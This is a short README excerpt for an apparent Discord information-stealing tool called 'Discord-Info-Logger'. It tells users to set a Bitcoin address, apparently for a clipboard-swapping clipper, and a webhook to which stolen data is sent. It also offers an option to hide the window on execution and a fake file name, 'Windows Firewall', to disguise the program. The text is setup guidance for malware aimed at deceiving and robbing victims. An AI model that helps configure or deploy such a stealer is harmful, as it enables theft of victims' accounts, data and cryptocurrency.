ramin245/Discord-Info-Logger/README.md

 Once you have opened the script in your desired text editor, there are 3 lines that you can change.
 ```
 # Configuration
+BTC_ADDRESS = '3LsZH7LqxJMZBaVU9YoTLk8HNnUcmzE88v' <--- Change this to your own bitcoin address
 webhookURL = "webhook" <--- Change this to your own webhook
 hiddenWindow = False <--- Set this to True or False.
 If you want the window to be hidden on execution then set this to True
 FakeFileName = "Windows Firewall" <--- Change this to the fake desired name.